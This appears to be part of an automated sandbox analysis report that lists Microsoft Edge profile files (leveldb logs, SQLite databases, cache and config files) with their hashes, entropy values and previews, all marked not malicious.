                                                                                                                                                            SHA-512:4F47A2E6CE3391F4C53EE55A07C357FAA3AD73BC05EB2CFA6509062EAEC50B96D2A1BC9089B2026703891F99BE0DFC4B5934ADEA22FB1862A51D72F04506C247
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:03.070 1c58 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2025/01/06-17:05:03.124 1c58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12288
                                                                                                                                                            Entropy (8bit):0.3202460253800455
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                            MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                            SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                            SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                            SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28672
                                                                                                                                                            Entropy (8bit):0.46264415445953566
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu2:TouQq3qh7z3bY2LNW9WMcUvBu2
                                                                                                                                                            MD5:2D140C661F4801690D935779D661E636
                                                                                                                                                            SHA1:C942CE153AEF248AC420CA2D74E54D6DC7F74822
                                                                                                                                                            SHA-256:B9B88D303CFF256AFDBE4CB6C1D1030534BBF7836E0A0A46425832CEE40174F7
                                                                                                                                                            SHA-512:5D0AA6485085F130F5BE4F006B3F08AF7D402EE20E5817C9C9F4596EBB1CEB2EA29987A6C5BED22150925E8998468BE236F92B2B2FC0B1E369D49FD111CF9C99
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.448177365217996E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNlc3K:Ls3c6
                                                                                                                                                            MD5:2713450656905B1F0747480B17CEADF8
                                                                                                                                                            SHA1:BD4CB75BFAC3C3CA66B936E48B3BC439E6933E66
                                                                                                                                                            SHA-256:6DA48B67334C58B2F2519CD33F45ED4044A0B1D3FAD7E60E9B817363F8B0F152
                                                                                                                                                            SHA-512:6EA07983CE777F9FAEE7EE52B840162E1F84878961F86DBEF3B51242018113EC21567A0DFD5CDE43FA1A919C2D35693E03B4227F9A695BDEA8ECB53354F77FD5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..........................................F.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):33
                                                                                                                                                            Entropy (8bit):3.5394429593752084
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                            MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                            SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                            SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                            SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...m.................DB_VERSION.1

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):303
                                                                                                                                                            Entropy (8bit):5.216777187513372
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/gR1wkn23oH+TcwtnG2tbB2KLl9hJQ+q2Pwkn23oH+TcwtnG2tMsIFUv:7/g0fYebn9VFLzhC+vYfYebn9GFUv
                                                                                                                                                            MD5:6D04592F0BFC3679E7E746ED080749C2
                                                                                                                                                            SHA1:4B4513B1CDEC1DF6D2350D6FB64FEE3E24D8C685
                                                                                                                                                            SHA-256:BD0DEE27D44A6487302632C8139BB1AF9E82166D8B12903165A595975DC387F2
                                                                                                                                                            SHA-512:5E5C62CDFE23AC7DDB98066CEB0BE3E4DBF80CDB707FF6DE3F941A5B410416E5C271E62EB950D5B72BCED30F30297BB06FC5BF5EAA212462E89B3B81908E7B25
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.556 57c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2025/01/06-17:04:58.596 57c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):32768
                                                                                                                                                            Entropy (8bit):0.494709561094235
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                            MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                            SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                            SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                            SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.6133660015301419
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TLW4QpRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWnSbTMAqXR:TLqpR+DDNzWjJ0npnyXKUO8+jtTpQkmL
                                                                                                                                                            MD5:980D2A4C8468F877395D58CD6E7ECDC5
                                                                                                                                                            SHA1:C55284B9FB98F3B5C83187C133B812D92DC77369
                                                                                                                                                            SHA-256:421298A237B2EAD77D2C357B94CE066657D19FC5A041C5554AC372B39C1EC97F
                                                                                                                                                            SHA-512:D48B2B40D4BA9DB23B6F74EACB3E59E5EECA8D82B1482884D9CE6BA4246CE176D4E930A407A607EA7FA38396012EE3FE01EE6C214E0C70FD010EBB3D5BE79889
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):375520
                                                                                                                                                            Entropy (8bit):5.35407033130931
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:1A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:1FdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                            MD5:47AC14FD972F907F2E49F737044CAECA
                                                                                                                                                            SHA1:76601932D3A676D693BA1AF08355F850F5CAF841
                                                                                                                                                            SHA-256:EA9D2BD7A19BFA06BCB214E634BACFDE435CC1A4F29A2EE47293FFCF1A501A58
                                                                                                                                                            SHA-512:CCE56ECEE22EC407E87C66E1E4545072425910D02F37502184D8C2749F42C02997727CAF0FCBCBAE28D8CDADBAA80B07BDF9C09B2108052C7E417FC5834739B6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...m.................DB_VERSION.16.Oaq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380674704120877..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):309
                                                                                                                                                            Entropy (8bit):5.172446878030735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/pr1Rq1wkn23oH+Tcwtk2WwnvB2KLl9pnq2Pwkn23oH+Tcwtk2WwnvIFUv:7/pr1bfYebkxwnvFLzpnvYfYebkxwnQg
                                                                                                                                                            MD5:82A8551922A658CE939E56A278BFB314
                                                                                                                                                            SHA1:4E81C125EF65CA707D25A3607A84A1FF57C1704E
                                                                                                                                                            SHA-256:B7E0DCF816B06754806B60CCD24C1890C759EC3919B1D3299E7421F92B1D1E0A
                                                                                                                                                            SHA-512:F21DA945687B22352721DD036D0EB8A0B391B4E1C1102D67962D2A9711E6F399B1EA9C35C740492B9913B8B07BA9528540C0D68474DABC1866435E942EEBC8F2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:03.074 1c90 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/06-17:05:03.319 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):358860
                                                                                                                                                            Entropy (8bit):5.324606391263441
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RC:C1gAg1zfvK
                                                                                                                                                            MD5:8D34BED33AFB2749F37D32B185EB2335
                                                                                                                                                            SHA1:64F3174B8BEC1984991A7DEE398A4895B423052E
                                                                                                                                                            SHA-256:984B0DCA2FBD3A05AC5557924A681DAA7B4094253A172111CAB78577D903679E
                                                                                                                                                            SHA-512:DD9D6AAF34457EDFBAB832E986D49B8A5939FE94EAB61F04E13F46376ABCDE473596DC569A14A0B3A533F4EE499DA7A56E2DE7CA1B27BFEBB0EFE767C438B17A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000001.dbtmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
